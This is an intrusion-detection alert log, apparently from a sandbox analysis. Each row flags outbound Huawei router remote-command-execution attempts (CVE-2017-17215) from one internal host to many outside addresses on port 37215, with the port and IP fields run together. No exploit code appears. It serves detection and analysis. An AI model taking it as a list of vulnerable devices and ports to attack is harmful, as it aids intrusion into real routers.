                                                    07/10/24-08:26:59.709807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4423237215192.168.2.1441.164.200.141
                                                    07/10/24-08:27:13.721350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4711837215192.168.2.14139.243.161.70
                                                    07/10/24-08:26:17.999719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152237215192.168.2.14197.49.124.79
                                                    07/10/24-08:26:23.338726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3676637215192.168.2.14197.171.142.67
                                                    07/10/24-08:27:23.924578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597237215192.168.2.14184.147.107.26
                                                    07/10/24-08:27:28.049112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6068037215192.168.2.1420.18.198.152
                                                    07/10/24-08:26:18.028864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4595837215192.168.2.1441.184.113.250
                                                    07/10/24-08:26:49.837904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974837215192.168.2.14197.30.91.22
                                                    07/10/24-08:26:22.207242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6073637215192.168.2.14112.202.187.90
                                                    07/10/24-08:27:02.876931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5586237215192.168.2.14154.126.213.127
                                                    07/10/24-08:26:25.479051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4196437215192.168.2.14157.174.35.203
                                                    07/10/24-08:26:20.143490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714437215192.168.2.14142.99.86.213
                                                    07/10/24-08:26:34.212749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497037215192.168.2.14197.161.92.178
                                                    07/10/24-08:26:57.677011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5731037215192.168.2.14157.187.235.208
                                                    07/10/24-08:27:23.949605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4436837215192.168.2.14157.214.166.202
                                                    07/10/24-08:26:20.142588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041837215192.168.2.14211.229.56.80
                                                    07/10/24-08:27:28.149235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5656437215192.168.2.14197.213.171.122
                                                    07/10/24-08:27:28.155678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4042837215192.168.2.14197.177.14.229
                                                    07/10/24-08:27:02.740584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5776437215192.168.2.14157.69.68.21
                                                    07/10/24-08:27:02.833668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3570637215192.168.2.1441.136.228.81
                                                    07/10/24-08:26:48.005351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3507237215192.168.2.1439.21.174.199
                                                    07/10/24-08:26:57.659846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738237215192.168.2.14197.136.110.95
                                                    07/10/24-08:27:22.835988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5027837215192.168.2.14157.252.18.168
                                                    07/10/24-08:27:27.144985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5069037215192.168.2.1441.48.81.59
                                                    07/10/24-08:26:43.667118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5563237215192.168.2.14157.98.14.193
                                                    07/10/24-08:27:28.131981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4378637215192.168.2.1431.11.86.149
                                                    07/10/24-08:26:23.358336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3939637215192.168.2.14157.36.29.160
                                                    07/10/24-08:26:51.939939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041837215192.168.2.14197.124.4.197
                                                    07/10/24-08:26:41.517439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3330437215192.168.2.14197.109.166.250
                                                    07/10/24-08:26:28.850174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4236637215192.168.2.1441.68.81.0
                                                    07/10/24-08:26:43.626200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4204837215192.168.2.1441.3.72.81
                                                    07/10/24-08:27:14.863402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4605437215192.168.2.14197.238.4.11
                                                    07/10/24-08:26:29.841830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5652637215192.168.2.14157.8.229.188
                                                    07/10/24-08:26:20.130042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5715037215192.168.2.1441.203.128.48
                                                    07/10/24-08:26:57.580617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4132637215192.168.2.1441.211.85.54
                                                    07/10/24-08:26:28.746677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823637215192.168.2.14157.11.97.23
                                                    07/10/24-08:26:15.876739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5831637215192.168.2.1488.229.205.130
                                                    07/10/24-08:26:55.405670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4214437215192.168.2.14197.10.87.35
                                                    07/10/24-08:26:13.776701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3672437215192.168.2.1441.111.125.2
                                                    07/10/24-08:26:26.605487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4081237215192.168.2.14101.220.150.209
                                                    07/10/24-08:26:34.224175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530237215192.168.2.14134.228.33.185
                                                    07/10/24-08:27:31.555849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4936437215192.168.2.14197.119.139.198
                                                    07/10/24-08:26:59.598590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3534637215192.168.2.14157.75.16.59
                                                    07/10/24-08:26:31.095778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3378237215192.168.2.14157.239.250.115
                                                    07/10/24-08:26:59.541812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077437215192.168.2.1441.163.127.35
                                                    07/10/24-08:26:28.924774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4023237215192.168.2.1441.127.211.90
                                                    07/10/24-08:27:07.361334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3383237215192.168.2.14157.244.111.33
                                                    07/10/24-08:27:19.240664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550637215192.168.2.1441.219.38.206
                                                    07/10/24-08:26:14.807023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572837215192.168.2.14167.223.148.182
                                                    07/10/24-08:27:23.503899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3649637215192.168.2.14157.225.30.253
                                                    07/10/24-08:27:30.500582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4033837215192.168.2.14157.87.68.180
                                                    07/10/24-08:26:17.967479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5275237215192.168.2.14197.93.235.10
                                                    07/10/24-08:27:05.191849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193437215192.168.2.14197.232.117.225
                                                    07/10/24-08:27:13.896003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4394437215192.168.2.14157.226.247.179
                                                    07/10/24-08:26:23.335498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386637215192.168.2.14171.127.78.116
                                                    07/10/24-08:26:17.949635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4595437215192.168.2.14197.59.253.121
                                                    07/10/24-08:26:59.881889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5282637215192.168.2.14197.105.249.163
                                                    07/10/24-08:26:17.972385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3521037215192.168.2.14157.192.205.142
                                                    07/10/24-08:26:43.857125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5133837215192.168.2.14157.252.58.236
                                                    07/10/24-08:27:22.505439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4787237215192.168.2.14197.214.92.210
                                                    07/10/24-08:27:10.556595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4825037215192.168.2.1441.219.117.101
                                                    07/10/24-08:27:22.913533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5633437215192.168.2.1441.0.173.219
                                                    07/10/24-08:26:31.069487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4635837215192.168.2.142.157.255.116
                                                    07/10/24-08:26:59.843176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838437215192.168.2.14197.145.46.135
                                                    07/10/24-08:26:17.985127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966837215192.168.2.1483.170.36.118
                                                    07/10/24-08:26:53.181410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5788437215192.168.2.1441.138.15.177
                                                    07/10/24-08:26:59.839677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4307837215192.168.2.1441.201.11.164
                                                    07/10/24-08:27:33.862601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3984837215192.168.2.1414.165.220.31
                                                    07/10/24-08:26:55.377944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5406237215192.168.2.14157.248.163.112
                                                    07/10/24-08:26:42.412174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5660237215192.168.2.14157.111.76.162
                                                    07/10/24-08:27:19.321754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5309237215192.168.2.14159.20.109.163
                                                    07/10/24-08:27:27.159705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809437215192.168.2.14197.86.163.130
                                                    07/10/24-08:27:17.072702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4579037215192.168.2.14157.50.42.47
                                                    07/10/24-08:26:17.937591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4905437215192.168.2.14211.149.37.182
                                                    07/10/24-08:27:11.520220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5741837215192.168.2.14197.45.97.70
                                                    07/10/24-08:27:20.521213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5774637215192.168.2.14197.95.251.247
                                                    07/10/24-08:27:27.142415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5016837215192.168.2.1477.109.18.112
                                                    07/10/24-08:27:23.928325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4906237215192.168.2.14182.237.205.221
                                                    07/10/24-08:27:05.223403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5713237215192.168.2.1441.46.198.74
                                                    07/10/24-08:27:22.922579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3336437215192.168.2.14157.95.178.202
                                                    07/10/24-08:26:14.826871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5546237215192.168.2.14197.219.87.161
                                                    07/10/24-08:26:31.086476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264837215192.168.2.14157.224.69.162
                                                    07/10/24-08:26:11.155522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4801437215192.168.2.1489.92.141.49
                                                    07/10/24-08:26:17.967012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5700237215192.168.2.14197.122.66.182
                                                    07/10/24-08:27:02.709271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867637215192.168.2.14156.79.68.13
                                                    07/10/24-08:27:05.179313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3796437215192.168.2.1441.117.51.0
                                                    07/10/24-08:27:08.421271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4560437215192.168.2.14197.25.81.110
                                                    07/10/24-08:26:38.614472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4061037215192.168.2.14197.202.174.156
                                                    07/10/24-08:26:43.825233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4612237215192.168.2.1441.100.63.201
                                                    07/10/24-08:27:13.890011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4836237215192.168.2.1441.118.14.244
                                                    07/10/24-08:27:32.610394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5389037215192.168.2.1441.172.183.199
                                                    07/10/24-08:26:11.567410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3571837215192.168.2.1441.170.114.69
                                                    07/10/24-08:26:43.927826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5033837215192.168.2.14135.236.244.79
                                                    07/10/24-08:27:30.518988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4501037215192.168.2.14133.127.64.48
                                                    07/10/24-08:26:38.616347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4473637215192.168.2.14205.92.203.67
                                                    07/10/24-08:26:53.190112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3284637215192.168.2.14157.4.189.47
                                                    07/10/24-08:27:20.498164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556037215192.168.2.14157.225.225.36
                                                    07/10/24-08:26:17.939725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4908037215192.168.2.14188.120.90.127
                                                    07/10/24-08:26:28.882503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582037215192.168.2.14157.96.65.205
                                                    07/10/24-08:26:45.643057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664037215192.168.2.1451.19.5.88
                                                    07/10/24-08:26:59.873449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4277237215192.168.2.1478.107.110.73
                                                    07/10/24-08:26:45.643057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5620837215192.168.2.1441.23.101.150
                                                    07/10/24-08:27:20.488674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4412637215192.168.2.14151.27.204.126
                                                    07/10/24-08:27:19.239494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3584237215192.168.2.14197.79.130.237
                                                    07/10/24-08:26:20.113849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3383637215192.168.2.14197.6.123.232
                                                    07/10/24-08:26:31.103599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373837215192.168.2.14142.109.127.97
                                                    07/10/24-08:26:36.337218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3322637215192.168.2.1461.194.235.56
                                                    07/10/24-08:26:59.873449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3946437215192.168.2.14157.152.216.165
                                                    07/10/24-08:26:41.599892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6085037215192.168.2.1480.122.229.255
                                                    07/10/24-08:26:52.029785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3615837215192.168.2.1460.132.123.32
                                                    07/10/24-08:27:22.758689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922837215192.168.2.14197.205.164.252
                                                    07/10/24-08:26:43.713774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3429237215192.168.2.1441.146.87.143
                                                    07/10/24-08:26:22.260349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5774037215192.168.2.1441.64.247.55
                                                    07/10/24-08:26:33.156577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3824637215192.168.2.14197.160.238.49
                                                    07/10/24-08:26:13.831960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4073237215192.168.2.14157.171.136.29
                                                    07/10/24-08:27:32.523426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266437215192.168.2.14197.68.31.40
                                                    07/10/24-08:26:53.198979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5445437215192.168.2.14157.95.124.17
                                                    07/10/24-08:27:05.141493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335037215192.168.2.14197.251.97.197
                                                    07/10/24-08:27:02.823605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3698437215192.168.2.14157.12.168.147
                                                    07/10/24-08:26:42.466841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3730637215192.168.2.1441.47.213.3
                                                    07/10/24-08:26:15.827903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3742637215192.168.2.1441.140.187.35
                                                    07/10/24-08:26:29.874680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968637215192.168.2.14197.246.169.209
                                                    07/10/24-08:26:33.227132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4848037215192.168.2.1441.3.131.169
                                                    07/10/24-08:26:49.846207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5363637215192.168.2.14157.141.117.254
                                                    07/10/24-08:26:59.753614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5503637215192.168.2.14157.225.52.103
                                                    07/10/24-08:26:11.594883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674237215192.168.2.14112.105.52.174
                                                    07/10/24-08:26:20.132351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952837215192.168.2.14197.79.62.138
                                                    07/10/24-08:27:19.193272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4796037215192.168.2.14157.195.162.201
                                                    07/10/24-08:26:36.346180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4037837215192.168.2.14197.75.48.177
                                                    07/10/24-08:27:07.362991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5784637215192.168.2.14157.33.183.72
                                                    07/10/24-08:27:30.454627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5918837215192.168.2.1441.27.15.25
                                                    07/10/24-08:27:31.485057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5458637215192.168.2.14121.13.105.160
                                                    07/10/24-08:27:28.139469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4947237215192.168.2.14185.29.38.210
                                                    07/10/24-08:26:43.870902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5129637215192.168.2.14197.44.34.87
                                                    07/10/24-08:26:31.053322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5057037215192.168.2.1482.141.105.233
                                                    07/10/24-08:27:19.295314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5479037215192.168.2.14157.241.122.88
                                                    07/10/24-08:26:23.317114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5035837215192.168.2.14157.26.170.61
                                                    07/10/24-08:26:42.374424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6024437215192.168.2.1413.152.71.219
                                                    07/10/24-08:26:14.824394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3505237215192.168.2.1441.206.2.119
                                                    07/10/24-08:26:48.002898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416437215192.168.2.14157.104.76.89
                                                    07/10/24-08:26:13.798574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5760437215192.168.2.1441.4.170.250
                                                    07/10/24-08:26:43.791767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5284037215192.168.2.14157.177.17.147
                                                    07/10/24-08:27:22.773941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4732637215192.168.2.14157.85.194.62
                                                    07/10/24-08:26:57.595763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913837215192.168.2.1473.27.247.25
                                                    07/10/24-08:27:23.902387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6021637215192.168.2.1441.238.196.251
                                                    07/10/24-08:26:43.652674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699837215192.168.2.14197.13.187.101
                                                    07/10/24-08:26:22.237415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362437215192.168.2.1441.38.255.196
                                                    07/10/24-08:26:36.407750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3286437215192.168.2.1441.95.147.197
                                                    07/10/24-08:26:26.586309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4095837215192.168.2.14197.182.192.165
                                                    07/10/24-08:26:57.551648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688037215192.168.2.1441.94.163.136
                                                    07/10/24-08:27:32.549149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4945837215192.168.2.14217.200.104.83
                                                    07/10/24-08:26:20.128775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4473237215192.168.2.14133.141.216.1
                                                    07/10/24-08:27:22.810848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3813437215192.168.2.14197.218.27.86
                                                    07/10/24-08:26:49.824367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5968837215192.168.2.14197.79.24.23
                                                    07/10/24-08:27:22.838932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4794437215192.168.2.14217.27.139.235
                                                    07/10/24-08:27:22.909297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4173837215192.168.2.1441.247.206.94
                                                    07/10/24-08:26:25.499422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4209037215192.168.2.1442.91.116.109
                                                    07/10/24-08:26:15.833286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4482837215192.168.2.1441.215.67.204
                                                    07/10/24-08:26:43.879601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4877037215192.168.2.14197.223.32.163
                                                    07/10/24-08:26:33.156135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3879437215192.168.2.14141.202.80.127
                                                    07/10/24-08:26:57.680054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694037215192.168.2.14197.221.50.233
                                                    07/10/24-08:27:07.372666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5058637215192.168.2.1424.159.188.110
                                                    07/10/24-08:26:28.914881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5892037215192.168.2.14176.196.25.237
                                                    07/10/24-08:26:29.805912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5428437215192.168.2.14197.111.40.134
                                                    07/10/24-08:26:33.206981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812437215192.168.2.14162.226.88.44
                                                    07/10/24-08:27:28.166168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5426637215192.168.2.14197.107.24.235
                                                    07/10/24-08:27:02.851731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3950637215192.168.2.14157.105.223.187
                                                    07/10/24-08:26:11.446922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5535837215192.168.2.14197.160.40.71
                                                    07/10/24-08:26:48.000164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5913037215192.168.2.14197.153.80.166
                                                    07/10/24-08:27:02.776043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079637215192.168.2.1481.195.13.54
                                                    07/10/24-08:26:11.107055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4944037215192.168.2.14197.45.3.44
                                                    07/10/24-08:26:43.638396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5490437215192.168.2.14157.21.165.237
                                                    07/10/24-08:27:19.174842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5900037215192.168.2.14197.154.212.225
                                                    07/10/24-08:26:13.842272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3851637215192.168.2.14197.180.32.246
                                                    07/10/24-08:26:29.875452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3849837215192.168.2.14197.148.183.242
                                                    07/10/24-08:27:13.912593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930837215192.168.2.1441.61.7.76
                                                    07/10/24-08:26:28.641864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5505437215192.168.2.14197.160.238.171
                                                    07/10/24-08:27:22.771022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4023037215192.168.2.14158.62.226.125
                                                    07/10/24-08:27:14.026177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4148237215192.168.2.14157.161.57.232
                                                    07/10/24-08:27:23.482835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5882237215192.168.2.1418.194.153.0
                                                    07/10/24-08:26:43.561007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5858637215192.168.2.1441.155.6.128
                                                    07/10/24-08:26:52.005613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5330237215192.168.2.14103.174.215.10
                                                    07/10/24-08:26:17.937517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053437215192.168.2.14157.157.227.134
                                                    07/10/24-08:26:45.666714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3671037215192.168.2.1442.36.216.243
                                                    07/10/24-08:26:15.858543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5787637215192.168.2.1439.190.170.193
